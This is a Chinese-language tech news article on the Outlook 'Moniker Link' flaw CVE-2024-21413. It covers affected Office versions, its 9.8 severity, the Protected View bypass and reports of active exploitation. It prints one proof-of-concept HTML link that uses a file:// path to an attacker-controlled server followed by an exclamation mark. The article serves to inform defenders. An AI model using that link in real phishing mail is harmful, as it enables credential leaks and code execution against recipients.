
黑客利用Outlook漏洞展開攻擊 只需打開帶有惡意鏈接的郵件即可觸發(fā)漏洞
CVE-2024-21413 漏洞是微軟在 2024 年 1 月公布并修復(fù)的安全漏洞,該漏洞由網(wǎng)絡(luò)安全公司 CheckPoint 安全研究人員 Haifei Li 發(fā)現(xiàn)并通報(bào)給微軟,主要涉及到 Outlook 郵件客戶端的遠(yuǎn)程代碼執(zhí)行問題。
該漏洞影響 Microsoft Office 2016、Microsoft Office 2019、Microsoft Office LTSC 2021、Microsoft 365 企業(yè)版應(yīng)用,漏洞評分達(dá)到 9.8/10 分。
這枚漏洞的描述是存在缺陷的 Outlook 版本打開帶有惡意鏈接的電子郵件時(shí)輸入驗(yàn)證不當(dāng),借助漏洞黑客可以繞過受保護(hù)的視圖 (該視圖會(huì)以只讀方式打開 Office 文件用來阻擋嵌入的有害內(nèi)容) 并以編輯模式打開惡意的 Office 文件。
在這種情況下黑客可以向目標(biāo)組織發(fā)送包含惡意代碼的釣魚郵件,只需要目標(biāo)組織的員工打開該郵件即可觸發(fā)漏洞并實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行,因此造成的危害還是非常大的。
目前已經(jīng)有黑客開始利用這枚漏洞展開攻擊,考慮到其潛在危害性,如果企業(yè)至今沒有升級 Outlook 版本封堵漏洞那可能會(huì)出現(xiàn)嚴(yán)重的安全問題。
CheckPoint 的研究人員也透露了該漏洞的工作方式:
這個(gè)被稱為 Moniker Link 的漏洞可以讓黑客使用 file:// 文件協(xié)議指向黑客控制的服務(wù)器 URL 并添加感嘆號來繞過 Outlook 內(nèi)置的受保護(hù)視圖。
#下面為示例代碼,基于安全考慮研究人員并未公布完整的利用方式 *<a?href="file:///\\10.10.111.111\test\test.rtf!something">CLICK?ME</a>*
考慮到這枚漏洞已經(jīng)公布 1 年了,這時(shí)候才有黑客利用也不是讓人驚訝的事情,如果都 1 年了企業(yè)還沒有更新 Outlook 封堵漏洞那也只能自求多福了。
[超站]友情鏈接:
四季很好,只要有你,文娛排行榜:https://www.yaopaiming.com/
關(guān)注數(shù)據(jù)與安全,洞悉企業(yè)級服務(wù)市場:https://www.ijiandao.com/

隨時(shí)掌握互聯(lián)網(wǎng)精彩
- 1 看總書記關(guān)心的清潔能源這樣發(fā)電 7904252
- 2 今年最強(qiáng)臺(tái)風(fēng)來襲 7808969
- 3 澳加英宣布承認(rèn)巴勒斯坦國 7711961
- 4 長春航空展這些“首次”不要錯(cuò)過 7615897
- 5 43歲二胎媽媽患阿爾茨海默病 7522847
- 6 iPhone 17橙色斜挎掛繩賣斷貨 7424366
- 7 女兒發(fā)現(xiàn)父親500多萬遺產(chǎn)用于保健 7334103
- 8 老奶奶去世3年 鄰居幫打掃門前落葉 7236720
- 9 英國航母從南?!傲锪恕?/a> 7141012
- 10 三所“零近視”小學(xué)帶來的啟示 7048947